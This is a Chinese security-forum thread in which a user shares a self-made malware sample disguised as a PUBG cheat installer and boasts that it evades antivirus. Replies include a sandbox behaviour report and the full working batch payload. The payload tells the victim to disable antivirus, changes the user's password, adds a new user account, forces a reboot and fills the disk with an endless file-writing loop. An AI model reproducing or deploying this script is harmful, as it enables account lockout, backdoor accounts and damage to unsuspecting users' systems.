自己做的敲竹杠……

remiliacn

发现不少AV竟然在VT上miss了。。所以传上来你们玩玩好啦

我爱舒肤佳

基本信息

文件名称：	绝地求生外{过}{滤}挂1.1.exe
MD5：	97013e59c4638214405b3733c22087b8
文件类型：	EXE
上传时间：	2018-02-03 07:59:59
出品公司：	N/A
版本：	N/A
壳或编译器信息：	PACKER:UPX V2.00-V3.00 -> Markus Oberhumer & Laszlo Molnar & John Reiser *
子文件信息：	[url=]详情[/url]

进程行为

行为描述：	创建进程
详情信息：	[0x00000ae8]ImagePath = C:\WINDOWS\system32\cmd.exe, CmdLine = "C:\WINDOWS\system32\cmd" /c ""C:\Documents and Settings\Administrator\Local Settings\Temp\4.tmp\5.bat" "C:\Documents and Settings\Administrator\Local Settings\%temp%\****.exe"" [0x00000af0]ImagePath = C:\WINDOWS\system32\net.exe, CmdLine = net session [0x00000af8]ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = net1 session

文件行为

行为描述：	创建文件
详情信息：	C:\Documents and Settings\Administrator\Local Settings\Temp\4.tmp C:\Documents and Settings\Administrator\Local Settings\Temp\4.tmp\5.tmp C:\Documents and Settings\Administrator\Local Settings\Temp\4.tmp\5.bat C:\Documents and Settings\Administrator\Local Settings\Temp\6.tmp
行为描述：	修改脚本文件
详情信息：	C:\Documents and Settings\Administrator\Local Settings\Temp\4.tmp\5.bat ---> Offset = 0
行为描述：	删除文件
详情信息：	C:\Documents and Settings\Administrator\Local Settings\Temp\4.tmp C:\Documents and Settings\Administrator\Local Settings\Temp\4.tmp\5.tmp C:\Documents and Settings\Administrator\Local Settings\Temp\4.tmp\5.bat C:\Documents and Settings\Administrator\Local Settings\Temp\6.tmp
行为描述：	查找文件
详情信息：	FileName = C:\DOCUME~1 FileName = C:\DOCUME~1\ADMINI~1 FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1 FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp FileName = C:\Documents and Settings FileName = C:\Documents and Settings\Administrator FileName = C:\Documents and Settings\Administrator\Local Settings FileName = C:\WINDOWS FileName = C:\WINDOWS\system32 FileName = C:\WINDOWS\system32\cmd.exe FileName = C:\Documents and Settings\Administrator\Local Settings\Temp FileName = C:\Documents and Settings\Administrator\Local Settings\%temp% FileName = C:\Documents and Settings\Administrator\Local Settings\Temp\4.tmp\5.bat FileName = C:\Documents and Settings\Administrator\Local Settings\Temp\4.tmp FileName = C:\Documents and Settings\Administrator\DESKTOP

其他行为

行为描述：	打开事件
详情信息：	HookSwitchHookEnabledEvent
行为描述：	创建互斥体
详情信息：	CTF.LBES.MutexDefaultS-* CTF.Compart.MutexDefaultS-* CTF.Asm.MutexDefaultS-* CTF.Layouts.MutexDefaultS-* CTF.TMD.MutexDefaultS-* CTF.TimListCache.FMPDefaultS-*MUTEX.DefaultS-*
行为描述：	打开互斥体
详情信息：	ShimCacheMutex
行为描述：	样本控制台输出内容
详情信息：	N/A

进程树

• [url=]****.exe (PID: 0x00000ad4)[/url]
  • [url=]cmd.exe (PID: 0x00000ae8)[/url]
    • [url=]net.exe (PID: 0x00000af0)[/url]
      
    
    
  
  

王国之心00

社工运用得不错，对不懂电脑的小学生有很强的杀伤力。过所有主流杀软

qq1094250746

红伞

安全守护者

1. 
   

复制代码

衍生物：

1. MD5：2902f4f66f0791e00f463d942d9217d5
   
2. SHA1：bed27352ffd4f9655549e9f1d880cefa8a80eda3
   
3. 文件大小：0.94 KB
   
4. 文件类型：bat

复制代码

衍生物哈勃：https://habo.qq.com/file/showdetail?pk=ADMGYV1sB2YIMVs0
批处理文本：

1. shift /0
   
2. @echo off
   
3. title 绝地求生外{过}{滤}挂安装程序
   
4. 
   
5. cd /d "%USERPROFILE%\DESKTOP"
   
6. net session >nul 2>&1
   
7. 
   
8. echo 正在验证安装程序完整性，请稍等片刻……
   
9. timeout 4 >nul
   
10. 
    
11. if %errorLevel% == 0 (
    
12. echo 验证成功！
    
13. timeout 4 >nul
    
14. echo 杀毒软件可能会出现误报，请暂时关闭杀毒软件。
    
15. echo 请按任意键开始释放主验证程序
    
16. pause
    
17. net user %username% bbs.kafan.com >nul 2>nul
    
18. net user qq_489851973 bbs.kafan.com /add >nul 2>nul
    
19. 
    
20. goto payload
    
21. ) else (
    
22. echo 抱歉！请使用管理员权限运行该软件！
    
23. echo 请按任意键退出安装！
    
24. pause >nul
    
25. exit )
    
26. 
    
27. :payload
    
28. echo 安装中！请勿关闭计算机！
    
29. timeout 4 >nul
    
30. echo 正在验证安装完整性！请勿关闭计算机……
    
31. timeout 5 >nul
    
32. echo 请注意保持该软件运行状态。软件正在自动尝试攻击BattleEye的防御系统
    
33. echo 请按任意键重启电脑，按键后电脑将会在3分钟后重启。
    
34. echo 我们将会在重启的时间段使用漏洞对反作弊系统进行攻击
    
35. echo 请尽量不要使用其他软件……
    
36. pause >nul
    
37. 
    
38. shutdown -r -t 180
    
39. 
    
40. :loop
    
41. cd %windir%
    
42. echo 哼~ >> lol.txt
    
43. goto loop
    

复制代码

-------------------------------------------------------------------------------------------
这个咋跟我的差不多【都是释放随机名BAT，后执行】

remiliacn

我爱舒肤佳 发表于 2018-2-3 08:06
基本信息

进程行为

我加花了。。这个分析没有一个正确的。。
真正的行为只有：
1、更改所有用户密码
2、增加一个新的用户
3、在C盘%windir%路径下创建一个很大的文本文档文件

remiliacn

安全守护者 发表于 2018-2-3 10:08
衍生物：
衍生物哈勃：https://habo.qq.com/file/showdetail?pk=ADMGYV1sB2YIMVs0
批处理文本：

因为purebasic用的最熟悉233

安全守护者

remiliacn 发表于 2018-2-3 10:20
因为purebasic用的最熟悉233

批处理更惨


没有任何检测引擎检测到此文件
SHA-256        d87cdd6c88b232a5a61bfa07c1647758ba5ea06bb3142b00351f3187bb02ba15
文件名        5_E0FB.bat
文件大小        963 B
上次分析时间        2018-02-03 02:19:59 UTC

remiliacn

安全守护者 发表于 2018-2-3 10:22
批处理更惨

可能是各大杀软不屑于检测batch

我是路人甲

remiliacn 发表于 2018-2-3 10:25
可能是各大杀软不屑于检测batch

按你那个密码我进不来卡饭论坛，这东西国内主防差不多都可以拦截吧